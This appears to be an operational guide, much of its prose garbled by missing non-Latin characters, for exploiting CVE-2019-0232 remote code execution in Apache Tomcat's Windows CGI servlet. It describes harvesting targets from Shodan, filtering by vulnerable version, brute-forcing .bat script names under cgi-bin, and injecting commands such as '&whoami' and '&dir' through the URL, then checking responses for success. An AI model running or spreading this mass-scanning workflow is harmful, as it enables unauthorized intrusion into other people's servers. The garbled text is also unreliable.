  APACHE TOMCAT/CGI-BIN (CVE-2019-0232)
 
      CVE-2019-0232.


EXPLOIT

  -       cgi-bin  Apache Tomcat.
-     .
   

http://localhost/cgi-bin/hello.bat?&whoami

    cmd.exe /c "whoami"

   :
https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/

       https://www.shodan.io/search?query=apache+tomcat
   shodan.io  .            .
       .csv        .

      :
- URL   (http://domain.com/cgi-bin/script.bat?&dir  )
-  HTTP-  ,   HTTP-   
- URL whoami- (http://domain.com/cgi-bin/script.bat?&whoami)
-  HTTP-   whoami (.),   HTTP-   

  :
1.   shodan.io   ,  .     .
   .csv  .json-,    (    ).
2.      .
3.       ,     7.0.94, 8.5.40  9.0.19 .
    ,  ,   .
    , .
4.  

http://domain.com/cgi-bin/hello.bat?&dir
http://domain.com/cgi-bin/test.bat?&dir
http://domain.com/cgi-bin/info.bat?&dir
http://domain.com/cgi-bin/0.bat?&dir
http://domain.com/cgi-bin/1.bat?&dir

 ,       ,       .
  ,    -        ,   .

   :

 hello.bat
 helloworld.bat
 test.bat
 index.bat
 info.bat
 sysinfo.bat
 run.bat
 tomcat.bat
 0.bat
 1.bat
 2.bat
 ...
 10.bat

 ,         0  9   .
 ,   hello.bat    :
hello.bat
hello0.bat
hello1.bat
..
hello9.bat

:        !
https://www.exploit-db.com/exploits/47073
:       , ..       .

4.     200  ,      :
-   dir      
mm.dd.YYYY    HH:mm    <DIR>    .
mm.dd.YYYY    HH:mm    <DIR>    ..

     :
-   http://domain.com/cgi-bin/<script>.bat?&whoami
( script -   ,      200   )
-       .


     :
*         (, python  PowerShell)
*       ,   $(script).log,  $(script) -    
*     -   
*       -    
*      :
-  ,   
-    :
  - 
  -  
  -  HTTP-  
   (  -  )  :
- %  , %   
-       HTTP-   (     ).
